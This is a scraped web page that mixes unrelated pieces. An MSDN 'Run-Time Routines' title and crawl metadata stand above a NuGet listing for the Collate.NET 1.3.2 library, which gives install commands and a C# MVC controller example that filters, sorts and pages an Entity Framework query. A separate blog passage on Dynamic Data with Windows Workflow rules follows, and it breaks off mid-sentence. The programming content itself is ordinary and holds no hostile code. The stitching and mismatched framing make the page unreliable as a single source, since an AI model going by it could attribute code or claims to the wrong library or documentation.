_stat | Run-Time Routines and .NET Framework Equivalents
http://msdn.microsoft.com/en-us/library/221w8e43(VS.71).aspx
crawl-002
refinedweb
246
61.22
Collate. NET 1.3.2 See the version list below for details. NuGet\Install-Package Collate.NET -Version 1.3.2 dotnet add package Collate.NET --version 1.3.2 <PackageReference Include="Collate.NET" Version="1.3.2" /> paket add Collate.NET --version 1.3.2 #r "nuget: Collate.NET, 1.3.2" // Install Collate.NET as a Cake Addin #addin nuget:?package=Collate.NET&version=1.3.2 // Install Collate.NET as a Cake Tool #tool nuget:?package=Collate.NET&version=1.3.2 Collate.NET. Usage Let's say you have an MVC controller which accepts requests from a grid control: using Collate.Implementation; public UserController : Controller { public ActionResult GetItems(int pageNumber, int pageSize, string sortField, string sortDirection, string filterField, string filterValue) { var request = new PageAndFilterAndSortRequest { PageNumber = pageNumber, PageSize = pageSize, Sorts = new ISort[] { new Sort { Field = sortField, Direction = (sortDirection == "asc") ? SortDirection.Ascending : SortDirection.Descending } }, Filters = new IFilter[] { new Filter { Field = filterField, Operator = FilterOperator.Contains, Value = filterValue } } }; IList<User> data; using (var dbContext = new MyDataContext()) { data = dbContext.Users .Filter(request) .Sort(request) .Page(request) .ToList(); } return Json(data, JsonRequestBehavior.AllowGet); } } This way, all the control over what field(s) to filter and sort by are in the hands of the client, as well as controlling the page and page size of the data to be viewed, and yet all the filtering is done efficiently since Entity Framework will translate the IQueryable expression into a SQL query, and all the filtering, sorting and paging will be done in-database, and the response will be just the data that is needed to show the expected data in the grid. This is also useful for N-Tier applications where you don't want to go the nuclear option and enable odata all the way up and down the pipeline. By impelmenting a few simple interfaces you can enable performant filtering and sorting in data-heavy applications without needing to re-architect your entire application. Please refer to the Tests project within the solution for more usage examples. .NETStandard 2.0 - No dependencies. NuGet packages This package is not used by any NuGet packages. GitHub repositories This package is not used by any popular GitHub repositories. Adds SourceLink support
https://www.nuget.org/packages/Collate.NET/1.3.2
CC-MAIN-2022-40
refinedweb
366
50.53
django_taxbot 0.0.6 A simple Django app to figure out currencies in a limited number of countries============= Django Taxbot ============= This application attempts to make a little bit of sense out of the mess that is the tax landscape. It uses a saved (and regularly updated and expanding) dictionary of aggregated taxes to figure out payable taxes based on a set of passed in values. It bears noting that I have created this for my own use and while I intend to update is regularly, the accuracy of these values must be verified by the developer prior to use. While I wait for a suitable API for tax aggregates, I have compiled my own list and based this application on that list. Presently, this application only handled taxes in Canada, parts of the US, in Great Britain and in Nigeria. ----------- Quick Start ----------- 1. Install easily with pip: .. code :: python pip install django_taxbot 2. Add to your installed apps: .. code :: python INSTALLED_APPS = ( ... 'taxbot', ... ) 3. Import the TaxClient object in your projects and use as shown ----------------- Detailed Overview ----------------- This section details the way the application can be used. To create a new ``TaxClient``, simply import and use like so: .. code :: python from taxbot import TaxClient client = TaxClient() And just like that, we now have a new TaxClient. This client is initialized as Sales Tax client by default. To get Meal tax instead, pass in the ``M`` flag when initializing the client. .. code :: python client = TaxClient('M') Now we'll go over the methods available to the client. tax_known(self, country, [region, city]) ---------------------------------------- This method returns a Boolean value which informs us if the tax for the location is known or not. It is recommended that this method is called before any actions involving tax rates. Pass in as much information as possible to get the best results from this client. The method expects the country to be in ISO-ALPHA-2 codes. See Region codes are 2 character alphas also and cities can be spelled out. For countries with simple tax structures (Great Britain and Nigeria for now), the region and the city may be ignored. get_tax(self, country, [region, city]) -------------------------------------- Same as above, this method takes in 3 parameters. It calls on the ``tax_known`` method and so it is not necessary to call to the former beforehand. This method returns the tax as a Decimal or in instances where tax structure is more complicated, returns a dictionary of applicable taxes. ** Important ** Please check the type of return values from this method before using them. calculate_tax(self, amount, country, [region, city]) ---------------------------------------------------- In addition to the parameters above, this method accepts the value on which the tax is to be calculated and returns a dictionary of all calculated taxes. create_tax(self, amount, country [region, city]) ------------------------------------------------ In addition to the above, this method will create a ``Tax`` (and a ``CanadianTax``)object where the tax is known. Please refer to the code base in the app repository to view the fields available on the respective objects Cheers - Downloads (All Versions): - 0 downloads in the last day - 58 downloads in the last week - 562 downloads in the last month - Author: Seiyifa Tawari - Keywords: django tax rates -_taxbot-0.0.6.xml
https://pypi.python.org/pypi/django_taxbot
CC-MAIN-2016-18
refinedweb
535
70.23
I'm starting with input data like this Grouping is simple enough: g1 = df1.groupby( [ "Name", "City"] ).count() and printing yields a GroupBy object: City Name Name City Alice Seattle 1 1 Bob Seattle 2 2 Mallory Portland 2 2 Seattle 1 1 But what I want eventually is another DataFrame object that contains all the rows in the GroupBy object. In other words I want to get the following result: City Name Name City Alice Seattle 1 1 Bob Seattle 2 2 Mallory Portland 2 2 Mallory Seattle 1 1 I can't quite see how to accomplish this in the pandas documentation. Any hints would be welcome. g1 here is a DataFrame. It has a hierarchical index, though: In [19]: type(g1) Out[19]: pandas.core.frame.DataFrame In [20]: g1.index Out[20]: MultiIndex([('Alice', 'Seattle'), ('Bob', 'Seattle'), ('Mallory', 'Portland'), ('Mallory', 'Seattle')], dtype=object) Perhaps you want something like this? In [21]: g1.add_suffix('_Count').reset_index() Out[21]: Name City City_Count Name_Count 0 Alice Seattle 1 1 1 Bob Seattle 2 2 2 Mallory Portland 2 2 3 Mallory Seattle 1 1 Or something like: In [36]: DataFrame({'count' : df1.groupby( [ "Name", "City"] ).size()}).reset_index() Out[36]: Name City count 0 Alice Seattle 1 1 Bob Seattle 2 2 Mallory Portland 2 3 Mallory Seattle 1 I want to slightly change the answer given by Wes, because version 0.16.2 requires as_index=False. If you don't set it, you get an empty dataframe. Aggregation functions will not return the groups that you are aggregating over if they are named columns, when as_index=True, the default. The grouped columns will be the indices of the returned object. Passing as_index=Falsewill return the groups that you are aggregating over, if they are named columns. Aggregating functions are ones that reduce the dimension of the returned objects, for example: mean, sum, size, count, std, var, sem, describe, first, nth, min, max. This is what happens when you do for example DataFrame.sum()and get back a Series. nth can act as a reducer or a filter, see here. import pandas as pd df1 = pd.DataFrame({"Name":["Alice", "Bob", "Mallory", "Mallory", "Bob" , "Mallory"], "City":["Seattle","Seattle","Portland","Seattle","Seattle","Portland"]}) print df1 # # City Name #0 Seattle Alice #1 Seattle Bob #2 Portland Mallory #3 Seattle Mallory #4 Seattle Bob #5 Portland Mallory # g1 = df1.groupby(["Name", "City"], as_index=False).count() print g1 # # City Name #Name City #Alice Seattle 1 1 #Bob Seattle 2 2 #Mallory Portland 2 2 # Seattle 1 1 # EDIT: In version 0.17.1 and later you can use subset in count and reset_index with parameter name in size: print df1.groupby(["Name", "City"], as_index=False ).count() #IndexError: list index out of range print df1.groupby(["Name", "City"]).count() #Empty DataFrame #Columns: [] #Index: [(Alice, Seattle), (Bob, Seattle), (Mallory, Portland), (Mallory, Seattle)] print df1.groupby(["Name", "City"])[['Name','City']].count() # Name City #Name City #Alice Seattle 1 1 #Bob Seattle 2 2 #Mallory Portland 2 2 # Seattle 1 1 print df1.groupby(["Name", "City"]).size().reset_index(name='count') # Name City count #0 Alice Seattle 1 #1 Bob Seattle 2 #2 Mallory Portland 2 #3 Mallory Seattle 1 The difference between count and size is that size counts NaN values while count does not.
https://pythonpedia.com/en/knowledge-base/10373660/converting-a-pandas-groupby-output-from-series-to-dataframe
CC-MAIN-2020-40
refinedweb
546
56.05
I am really having a hard time getting recursions but i tried recursion to match a pattern inside a string. Suppose i have a string geeks for geeks and i have a pattern eks to match.I could use many methods out there like regex, find method of string class but i really want to do this thing by recursions. To achieve this i tried this code: void recursion(int i,string str) { if(!str.compare("eks")) cout<<"pattern at :"<<i<<'\n'; if(i<str.length() && str.length()-1!=0) recursion(i,str.substr(i,str.length()-1)); } int main() { string str("geeks for geeks"); for(int i=0;i<str.length();i++) recursion(i,str.substr(i,str.length())); } pattern at 2 pattern at 12 You will never get pattern at 2, since compare doesn't work like that. Ask yourself, what will std::string("eks for geeks").compare("eks") return? Well, according to the documentation, you will get something positive, since "eks for geeks" is longer than "eks". So your first step is to fix this: void recursion(int i, std::string str){ if(!str.substr(0,3).compare("eks")) { std::cout << "pattern at: " << i << '\n'; } Next, we have to recurse. But there's something off. i should be the current position of your "cursor". Therefore, you should advance it: i = i + 1; And if we reduce the length of the string in every iteration, we must not test i < str.length, otherwise we won't check the later half of the string: if(str.length() - 1 > 0) { recursion(i, str.substr(1)); } } Before we actually compile this code, let's reason about it: "eks" iexcept for the current position Seems reasonable: #include <iostream> #include <string> void recursion(int i, std::string str){ if(!str.substr(0,3).compare("eks")) { std::cout << "pattern at: " << i << '\n'; } i = i + 1; if(str.length() - 1 > 0) { recursion(i, str.substr(1)); } } int main () { recursion(0, "geeks for geeks"); return 0; } Output: pattern at: 2 pattern at: 12 However, that's not optimal. There are several optimizations that are possible. But that's left as an exercise. compareneeds to use substrdue to it's algorithm. Write your own comparison function that doesn't need substr. forloop was wrong. Why?
https://codedump.io/share/niGobX9O91nT/1/searching-pattern-in-a-string
CC-MAIN-2017-13
refinedweb
378
67.65
Steem Developer Portal PY: Convert Sbd To Steem How to convert your SBD to STEEM using Python. Full, runnable src of Convert Sbd To Steem can be downloaded as part of the PY tutorials repository. In this tutorial we will explain and show you how to convert some or all of your available SBD balance into STEEM on the Steem blockchain using the commit class found within the steem-python library. The Steem python library has a built-in function to transmit transactions to the blockchain. We are using the convert method found within the commit class in the library. Before we do the conversion, we check the current balance of the account to check how much SBD is available. This is not strictly necessary as the process will automatically abort with the corresponding error, but it does give some insight into the process as a whole. We use the get_account function to check for this. The convert method has 3 parameters: - amount - The amount of SBD that will be converted - account - The specified user account for the conversion - request-id - An identifier for tracking the conversion. This parameter is optional Steps - App setup - Library install and import. Connection to testnet - User information and steem node - Input user information and connection to Steem node - Check balance - Check current STEEM and SBD balance of user account - Conversion amount and commit - Input of SBD amount to convert and commit to blockchain 1. App setup In this tutorial we only use 1 package: steem- steem-python library and interaction with Blockchain We import the libraries and connect to the testnet. import steembase import steem conversion. Conversion amount and commit The final step before we can commit the transaction to the blockchain is to assign the amount parameter. We do this via a simple input from the terminal/console. #get recipient name convert_amount = input('Enter the amount of SBD to convert to STEEM: ') This value must be greater than zero in order for the transaction to execute without any errors. Now that we have all the parameters we can do the actual transmission of the transaction to the blockchain. #parameters: amount, account, request_id client.convert(float(convert_amount), username) print('\n' + convert_amount + ' SBD has been converted to STEEM') If no errors are encountered a simple confirmation is printed on the UI. As an added confirmation we check the balance of the user again and display it on the UI. This is not required at all but it serves as a more definitive confirmation that the conversion has been completed correctly. #get remaining account balance for STEEM and SBD userinfo = client.get_account(username) total_steem = userinfo['balance'] total_sbd = userinfo['sbd_balance'] print('\n' + 'REMAINING ACCOUNT BALANCE:' + '\n' + total_steem + '\n' + total_sbd) The STEEM balance will not yet have been updated as it takes 3.5 days to settle. The SBD will however show the new balance. We encourage users to play around with different values and data types to fully understand how this process works. You can also check the balances and transaction history on the testnet portal. To Run the tutorial - review dev requirements - clone this repo cd tutorials/32_convert_sbd_to_steem pip install -r requirements.txt python index.py - After a few moments, you should see a prompt for input in terminal screen.
https://developers.steem.io/tutorials-python/convert_sbd_to_steem
CC-MAIN-2018-47
refinedweb
544
53.71
Lead Software Engineer It is really helpful example. This is the exact match we were looking for. Thanks very much Convert List to Array Convert List to Array Lets see how to convert List to Array. Code Description... a method Mylist.toArray to convert the List to Array. Here is the code Convert Array to List Convert Array to List In this section, you will learn to convert an Array to List. Code Description: This program helps you in converting an Array to List. Here we Java Conversion you the conversion of double into string. Convert ArrayList to Array... the conversion of text to word file. Convert Array to List In this section, you will learn to convert an Array to List. This program Java To Vb.Net Conversion - Java Beginners Java To Vb.Net Conversion How to convert Java Code To VB.net,which Software is useful to convert java to vb.net,plz Help Me java conversion java conversion how do i convert String date="Aug 31, 2012 19:23:17.907339000 IST" to long value array list array list How to get repeate occurence values from database table in java by using arraylist Conversion In Collections - Java Interview Questions Conversion In Collections Hi Friends, can u give code to convert... Friend, 1)Convert ArrayList To HashMap: import java.io.*; import java.util.... Map convertToMap(List list, String keyField) throws Exception { String Java Conversion Question - Java Beginners Java Conversion Question Hello sir ,How i can Convert Java Code to Vb.net ,Plz Help Me Java convert file to byte array Java convert file to byte array How to convert file to byte array in Java? Thanks Hi, To convert file to byte array in Java you have...) Use the insputStream.read(bytes); of the class to read the data into byte array
http://www.roseindia.net/tutorialhelp/allcomments/4934
CC-MAIN-2013-48
refinedweb
304
67.35
C++/CLI is a programming language created by Microsoft as a substitute for the older Managed Extensions for C++, which is now deprecated. As the name suggests, this language offers support for the .NET managed components in a C++ context. Many people are confused about why this language would be used, instead of the much more widespread and powerful C#. The main reason for this is that C++/CLI allows you to use both managed and unmanaged code, offering you the opportunity to control the memory that is used by your program, instead of leaving all the decisions to the Garbage Controller. It should be noted that C++/CLI is not usually used by itself to develop software, but rather as a middleware between .NET and C++. While there are many ways to write C++/CLI programs, in this article I will focus on a particular architecture that I generally used when developing this kind of applications. The solution will contain 3 components: the core C++ project, the C++/CLI wrapper and a C# project that will use the functionality of the core through the wrapper. A well-known usage of this type of technology is represented by the game engines that allow you to write scripts in C# – such as Unity3D or Xenko. Since game engines handle large quantities of data in a small amount of time, writing them in C# to begin with would not be a good idea regarding the performance of the engine. Thus, they are written in C++ and are made available to C# through a C++/CLI wrapper. Preparations data-src="" data-lazy-load> data-src="" data-lazy-load> In order to start working with the C++/CLI technology, it is necessary to install the module into Visual Studio. The first step is to open the Visual Studio Installer and press the “Modify” button. After that, expand the “Desktop development with C++” section on the right side of the window and select “C++/CLI support”. Then press “Modify” button again. Creating the Core project After the installation is done, open Visual Studio and create a new project. For its type, go to Visual C++ on the right menu and choose “Empty project”. I usually name this project “Core”, as it contains all the main functionality of the software; for the solution, you can choose any appropriate name. Before we start writing the actual code, we have to change the configuration of the project. Right-click on the project in the Solution Explorer and select “Properties”. Under “General”, select “Dynamic Library (.dll)” “Static Library (.lib)” as the configuration type. This will convert the project from an executable to a library that we can include in other projects. Select “Apply” and “OK”. This is all we have to do for now so we can start writing code. As I mentioned in the introduction, this type of project architecture is common with game engines; therefore, I will create an “Entity” class for this example that would represent a game object in such an engine. Right click on the project and select “Add->New item->Header file” and name the file “Entity.h”. Repeat for a C++ file named “Entity.cpp”. I chose to use a public field for the name as well as to get methods for the X and Y position so I can demonstrate how to use both of them in the wrapper. I have also added a void method that changes the position of the entity so that you can see how calling the method from the wrapper will have an effect upon the object from the core project. As you can see, I have named the namespace “Core”; this may or may not be appropriate for your project. In this example (and in many other projects that I worked on), the purpose of the core project is only to contain the functionality that is going to be accessed by the wrapper. However, if you intend to use the C++ .dll that will be generated in other C++ projects, the name “Core” might become confusing. In that case, I suggest changing the name to something like “Unity3D-Core”. You will understand why these names become a problem when we will start developing the wrapper. As you can see, I also added some printing to the methods so you can clearly see the order of the operations when we execute the program. I have also tried to only include simple operations so that we can focus on the main point of the tutorial, which is accessing this code in a .NET context. The last thing that I would like to do in this Core project is to create another header file, called “Core.h”, which we will include in the files from the wrapper. This might seem unnecessary for a project of such small scale, but I highly suggest doing so for larger projects. The reason is that when trying to work with the Core library in other projects, it is easier to include the “Core.h” header file and just take what you need from there, than to go through the process of learning the architecture of the project and thinking about which files you might need. Creating the Wrapper project Now that we are finished with the core code, we can move on to the wrapper project. Right-click the solution in the Solution Explorer, and select “Add->New project”. Go to “Visual C++->CLR” in the left menu, and select “Class Library”. I have called the project Wrapper in this case; other names you might use could have the form MyEngine-CLI. Before we start writing the wrapper code, we need to add a reference to the Core project, so that we can use the Entity class that we created there. Right-click the Wrapper project in the Solution Explorer, choose “Add-> Reference” and select the Core project. After that, right click again on your project, go to Properties>C/C++>Precompiled Headers and change the first option to “Not Using Precompiled headers”. Now that everything is set, we will begin with a class that you can use in all the C++/CLI projects that you will create in the future. I usually call this class ManagedObject. Let’s add a new header file called ManagedObject.h to the wrapper project. Note: In this example, I created a namespace called CLI for the Wrapper project; this avoids any confusion between the wrapper and the core. However, if you intend to have a more recognizable name for your wrapper namespace (such as the name of your project), it is important to follow the advice that I left in the previous note. ManagedObject will act as a superclass for all the wrapper classes that we will create in this project. Its sole purpose is to hold a pointer to an unmanaged object from the Core project. You can also notice that the class contains a destructor (~ManagedObject) – which will be called whenever you delete an object with the delete keyword – and a finalizer (!ManagedObject) which is called by the Garbage Collector whenever it destroys the wrapper object. You can also notice that I have defined the ManagedObject class as a template. You will see why when we create our first wrapper class. Add a “Entity.h” file to the project, as well as a “Entity.cpp”. As you can see, we include the “Core.h” file that we created in the Core project, so that we can access all the classes from there. Then we define the Entity wrapper class, which is a subclass of the ManagedObject; you can now see why ManagedObject was a template: so that we can specify the unmanaged class for each of our wrapper classes. When creating a wrapper class, the idea that you need to follow is that you should declare all the members from the core class that you want to access from the .NET context. In this case, I created a constructor just as the one from the core Entity class – except that it takes a String for the name instead of a const char*, the Move methods and, instead of creating get-methods as I did in the core project, I made 2 properties just so you can see that you will be able to access them from C#. Before moving further to the “Entity.cpp” file, I would like to add a function in “ManagedObject.h” that you will also use a lot in this type of project. This function allows you to convert a .NET String to a const char* which you can further use in C++. If you want to do the conversion the other way around, things are not so complicated: the String class contains a constructor that accepts a const char* as a parameter. Now, for the “Entity.cpp”, we only have to define the constructor and the Move method. I have again added some console printing, but this time I used the .NET Console class to do so. Other than that, the only thing that has to be done in each method is to call its counterpart from the core project. An important thing to notice about the data types is that all the primitive types from C++ are compatible with their C# counterparts and therefore need no conversion in order to pass them from one context to another. Apart from the .NET String to a C++ const char* conversion, you might find yourself in the position where you need to convert a .NET array to a C++ one. Even though they might look the same, there is a big difference between them: a .NET array is an object, while a C++ array is simply a pointer to the first element. I did not include any arrays in this example, but I will give you an example of a function that does the conversion: I chose to create the example with an integer array, but you can replace int with any type that you need. However, I recommend writing the code for this conversion wherever you need it rather than using a function like this, since, as you can see, there are two components that you need to know for the unmanaged array: the pointer to the first element and the number of elements. You can, of course, create a struct to hold both of these elements, but it is a simpler and more elegant solution to just write these two lines of code for each separate case where you need to. Creating a C# sandbox project The last part of this tutorial is to create a C# project and test whether we are able to access the C++ functionality or not. Right-click the solution and add a new C# console application; I have called it Sandbox. After that, add a reference from the Sandbox project to the Wrapper, the same way you did earlier. We are now ready to code a C# test; we can easily check the result by looking at the text that will be printed in the console. We are able to easily create a new Entity object – which is the Entity from the Wrapper project, not the one from the Core – and access the methods and properties that is has to offer. Before running the project, make sure to right click on it in the Solution Explorer, and choose “Set as startup project”. An interesting thing that you might notice in the console is that the core Entity object is created before the wrapper Entity object – this is actually an illusion created by the console-printing, since the superclass constructor from the wrapper Entity object is called before the Console::WriteLine method is called. data-src="" data-lazy-load> Conclusion The example that I developed for this article is very basic, as the main purpose of the article was to show you the architecture that is involved in a C++/CLI wrapper. If you wonder why you would ever use this technology for something as simple as accessing and changing two variables, the answer is that you should not. I mentioned game engines as a main candidate for using a wrapper several times in this article, because this is the example that I am most familiar with, but it is not the only acceptable case. However, you should spend some time taking all the possible solutions into consideration before deciding to use C++/CLI instead of just C#: Does it really increase the performance of your software? Is the Garbage Controller really hurting the memory usage of your program so much that you need to handle it yourself? There are many such questions that may appear along the way, so I suggest documenting a lot about the technologies that you are using in your project before deciding to introduce a C++/CLI wrapper into it.
https://www.red-gate.com/simple-talk/dotnet/net-development/creating-ccli-wrapper/
CC-MAIN-2020-05
refinedweb
2,152
67.89
10:00 a.m. This Sunday: Getting Lost on the One True Path Prowler mistakes roof for a train East Palo Alto chief named interim city manager LET'S DISCUSS: Read the latest local news headlines and talk about the issues at Town Square at PaloAltoOnline Support Palo Alto Weekly's print and online coverage of our community. Join today: SupportLocalJournalism.org/PaloAlto: events/fundraisers/ or., I Veronica Weber Kelly McGonigal, a health psychologist and educator for the Stanford School of Medicine's Health Improvement Program, wrote "The Willpower Instinct," offering insights into what willpower is and how everyone can manage it. Page 12 Title Pages control, the science points to one thing: the power of paying attention. Self-awareness, self-care, and remembering what matters most are the foundation for self-control." Freelance writer Kathy Cordova can be emailed at khcordova@ gmail.com.?,. NOTICE OF PUBLIC MEETING of the City of Palo Alto Historic Resources Board [HRB] 8:00 A.M., Wednesday, March 7,-000). Man- d storytelling, and noon to 4 p.m.. In lieu of flowers, please send donations to Congregation Kol Emeth (kolemeth.org), Yiddish Book Center (yiddishbookcenter.org) or Hadassah (sharone-hadassah.org)..)law,. Robin Robinson Nov. 18, 1931 � Dec. 25, 2011 Robin James Robinson, beloved by his family and many friends, died comfortably at home on December 25, 2011, at age 80 of prostate cancer. He is survived by his wife Carolyn Caddes; his step-daughter Jill Caddes of San Francisco, his stepson and daughter-in law, Scott and Polly Washburn Caddes, their three children, Hayley, Jake, and Garrett, of Los Altos, California; and Robin's sister, Diane Bonem, of New Braunfels, Texas. Robin was born and grew up in Beaumont, Texas. He graduated from Rice University in 1954, and earned his PhD in Chemical Engineering from the University of Michigan. He joined Exxon Corporation as a project manager for developing technologies to extract oil from the ground and from the ocean floor. His work took him all over the world, including Japan; England; Australia; Norway; Venezuela; Laguna Beach, California; New Jersey; and Houston, Texas. After retiring from Exxon in 1986, he worked for a hazardous waste cleanup business in Washington and then ran his own consulting firm. In 1996, Robin and Carolyn moved to Palo Alto where Carolyn had lived many years. Robin became an enthusiastic citizen. He helped raise funds for the Palo Alto History Museum and was a Board member and president of Abilities United (formerly C.A.R.), an. organization that provides services for people with disabilities. In 2003 he was elected to the Palo Alto Fellowship Forum and was its president from 20102011. He served twice as president of the 101 Alma Condominium Association. Robin loved tennis, skiing, bridge, reading, crossword puzzles, and poker. His colleagues at his weekly poker game warned newcomers that despite Robin's friendly good humor, he almost always came away a winner. His friend Tom Ehrlich said, "He certainly was a winner in life and will be missed by his family and friends whose solace is in the many warm memories, stories, and good deeds that he left behind." A memorial service will be held on Monday, February 27, 2012 at 4pm at the First Congregational Church of Palo Alto, 1985 Louis Road at Embarcadero. Contributions in honor of Robin may be made to Abilities United, 525 E. Charleston Rd., Palo Alto, CA 94306 or to the Palo Alto History Museum, PO Box 676, Palo Alto, CA 94302. PA I D Alto residents have been picking up their mail and buying stamps at the downtown post office since 1932, but change is coming and with the financial meltdown of the Postal Service, 380 Hamilton Ave. is likely to have a new owner before the year is out. A solid majority of the City Council voted Tuesday to make sure the city is among the bidders when the service chooses who will buy the beautiful and historic 20,300-square-foot building that was designed by Palo Alto's own Birge Clark. The building's distinctive Spanish Colonial Revival style was a Clark trademark, which broke the rules laid down by postal officials at the time. Ultimately it became the first post office ever commissioned to be intentionally designed for the purpose, but was only accepted after the direct intervention of President Herbert Hoover, a friend of Clark's. During Tuesday's presentation at City Hall, postal officials explained the service's acute nationwide financial problems, which are forcing the sale of Palo Alto's downtown post office and many other buildings elsewhere on the Peninsula and around the country. But while the Postal Service wants to downsize, the officials said they are not abandoning downtown Palo Alto, where they hope to lease about 3,500 square feet of commercial space, either in the old post office or within a few blocks of 380 Hamilton. The council wisely directed its staff to appraise the property and begin evaluating eventual uses for the site, although it is far from clear whether it makes financial sense to purchase the property. The PF (public facility) zoning at the site must either house a public use or be rezoned for other uses, Planning and Community Environment Director Curtis Williams told the council. Any buyer would have to `Gorgeous building' is overcome many procedural historically significant to hurdles and proceed with the city. caution before modifying � Palo Alto City Councilman the building, which is listed Sid Espinosa on the city's inventory of historical buildings and the U.S. Department of Interior's National Register of Historic Places. The restrictions would make it difficult to use the building for a private, profit-making use, although it would not be impossible. The council did not identify a funding source to purchase the building, which in an entirely off-the-cuff estimate, one local developer said could be worth about $6 million or more. The Postal Service is looking for a quick sale and is hoping to put the building on the market in May of this year. Many of the comments Tuesday spoke about the history and beauty of the building. Councilman Sid Espinosa said the post office is a "gorgeous building," that is historically significant to the city. He urged city staff members to consider "creative uses" for areas around the building, including the parking lot. The council ultimately adopted Councilwoman Gail Price's motion asking staff to appraise the site and consider "adaptive reuse concepts" and "planning strategies" for the site. On Tuesday the council did not focus on potential uses for the building, but back in December Councilman Pat Burt said he would like to explore making it the site of the Development Center. The city's current center is located in leased space at 285 Hamilton, across the street from City Hall. Given the possibility that the building's zoning designation and historic rating could lower its price, the city should think creatively about uses for this one-of-a-kind Birge Clark building. One possibility that could help remedy the long-running and so far unsuccessful search for a public-safety building would be to move the downtown library to the post office, lease 3,500 square feet back to the Postal Service, and use the library building to house portions of the police department, which is located across the street. With its two prominent entrances, the post office could have its own access to the smaller branch post office, while the current library, or some other use compatible with the public facility zoning, could use the other. Regardless, this beautiful public building should be preserved and given a new life by the city, particularly if it can ease overcrowding at City Hall. Or it could be leased to a tenant who could work with the zoning profile. A good example of the city finding a new purpose for a large building is the Senior Center takeover of the old police station on Bryant Street. Although the police station was vacant for nearly 10 years, the city worked with a citizens group that raised more than $1 million in the early 1970s to refurbish the 16,000-square-foot building that housed all the city's senior programs and continues to do so under the Avenidas banner. It is a good example of how historic city buildings like the post office can be given a new lease on life. Page 18 Spectrum Editorials, letters and opinions Compost facility feasibility Editor, Now that Measure E has opened the door to using 10 acres of parkland for a compost facility, residents must watch the city's actions closely to make sure that a decision is made quickly, and if the real financial merit of the plant is not feasible -- make sure that the parkland is rededicated. All concerned residents must insist that our leaders respond to the following questions: 1. How do we make sure that the "cost" (market value) of the 10 acres of real estate is fully accounted for in any financial feasibility study? 2. How do we assure that there is absolute integrity in all the assumptions used to evaluate the project (real financial merit vs. pipe dreams)? 3. How do we keep study costs to a minimum (i.e., if it is clear that the anaerobic digester does not meet financial return goals, stop the detailed study and return the parkland)? Without this scrutiny, we will spend money and delay a precious park resource without delivering any value. Watchdog efforts like these are bad news for those hoping that there might be a loophole to convert the land to another purpose once the memory of implied promises have faded. That promise: The city will provide an innovative composting plant that returns a positive financial return (including the market value of the land) or return it to parkland and proceed with the long-delayed recreational vision for our waterfront. Got accountability? Compost or get off the pot. Timothy Gray Park Boulevard?. Electrify Caltrain Editor, The latest sugar in the California High Speed Rail Authority boondoggle is to provide electrification for the Peninsula Caltrain System. Back in 2000 Santa Clara County voters approved Measure A, which extended the 1996 sales tax for the BART extension, but also for Caltrain electrification. The Palo Alto Chamber of Commerce got on board, so to speak, since electrification promised fast, frequent and quiet Caltrain. That was the sugar for Measure A. Bottom line: We were promised electrification once in Measure A and now for high-speed rail. This is doubling down on bait and switch. Chop Keenan Keenan Land Co. Palo Al: surpris- ingly,history.+ La Comida has been serving delectable and affordable meals to seniors since 1972 450 Bryant Street-Downtown Palo Alto La Comida Dining Room (650) 322-3742 Current menu: LaComida.org/menu.aspt South Palo Alto location for a La Comida hot lunch: Stevenson House, 455 E. Charleston Phone: 494-1944 Ext. 10." Page 24an�aan�a. , OPERA REVIEW fianc�,�)music2003) pacomusic.org or call 650-856-3848. iddriven long- time RACHEL McADAMS & CHANNING TATUM ARE AMAZING." SHAWN EDWARDS/FOX-TV " ... CHECK LOCAL LISTINGS FOR THEATERS AND SHOWTIMES SEE IT ON A BIG SCREEN CHECK LOCAL LISTINGS FOR THEATERS AND SHOWTIMES Page 30 warily living underfoot of us human "beans," and stealthily "borrowing" what they need to survive. But it's also a reminder that the seemingly small package of a hand-drawn animated film remains a warmly welcome alternative to the often cold equivalent Network, "The Vow" might have been the result. Fortunately, leads Rachel McAdams ("Midnight in Paris") and Channing Tatum ("Haywire") serve up solid performances and help keep the film somewhat grounded despite its proclamations about love and loyalty. The fledgling marriage between young A&E DIGEST REEL LOCALS ...Two Palo Alto filmmakers are among the artists represented in this year's San Francisco International Asian American Film Festival, which has screenings next month in San Francisco, San Jose and Berkeley. Director Laura Green, who recently graduated from Stanford University, will screen her short documentary "Lady Razorbacks," about a group of Pacific Islander women starting a rugby team in East Palo Alto. That film will be shown March 10 and 15. Meanwhile, director Tanuj Chopra shows the narrative feature "Nice Girls Crew" on March 10 and 17. It's described as a "raunchy" tale of three childhood friends linking up again through a book club. For details about the film festival, which is in its 30th year, go to festival.caamedia.org/30/. Little Arrietty (voiced by Bridgit Mendler) encounters a cat in "The Secret World of Arrietty.") resources to saving the whales. ,, six minutes. -- T.H. (Reviewed Nov. 25, 2011) 1/2 A Separation (Guild) Even as she defends her divorce filing, an Iranian woman says of her spouse, "He is a good, decent person." But "A Separation" -- Iran's entry for Oscar quietly. Though the characters may not live in glass houses, it's a shattered windshield that attends the film's moment of truth.. Lunch Monday-Friday 11 AM - 2 PM Dinner Monday-Sunday 5 PM - 9 PM 408 California Ave. Palo Alto 328-8840 $ 301 El Camino Real, Menlo Park, somehow, Stanford not only survived, but thrived. When the marathon trip concluded, the Cardinal (11-2 overall) was No. 1 in the nation. "When. Page 36 Senior Brad Lawson is a returning All-American who missed much of the fall with an injury. He's healthy and back leading the Cardinal. .range Ather Senior tri-captain Will Cabral has played heads up this season. psy- chologicalplayer, Keith Peters Keith Peters Senior tri-captain Edgardo Molina (14) leads the Bears in scoring and has helped them to a No. 23 national ranking.?Ather
http://issuu.com/paloaltoweekly/docs/2012_02_24.paw.section1?viewMode=magazine&mode=embed
CC-MAIN-2015-18
refinedweb
2,303
59.94
.NET From a Markup Perspective In this post, I will show how to use the Windows Workflow Foundation rules engine to provide business logic for a Dynamic Data Entites Web Application. We will show how to change business rules without modifying code, drive the application based on a logical entity model, and map the entity model to a data store. I have to admit that I am in awe of how easy this was to do. To start, open Visual Studio 2008 with SP1 installed and create a new Dynamic Data Entities Web Application. This will generate what seems at first to be a lot of code, but once you peek under the hood you will see that it's really just templating code that you have full control over. I'm not going to explain all of Dynamic Data here, for more information you should check out the great getting started video series available at. Once you create the web application, add a new ADO.NET Entity Data Model. I named mine "Northwind.edmx". When propmpted, click OK to add the asset to the App_code folder. Next, a wizard pops up asking you what the model should contain. I chose "Generate from database" and used the Northwind database, choosing the Customers, Orders, and Order_Details tables. Once you have the model created, you need to wire it up to the application. Before we do this, make sure you download the Dynamic Data Entity Framework Workaround. In your ASP.NET web application, right-click and choose "Add ASP.NET Folder" and choose "Bin". Then copy the workaround DLL into your Bin directory. We use this DLL to wire up the model to our dynamic data application. Open 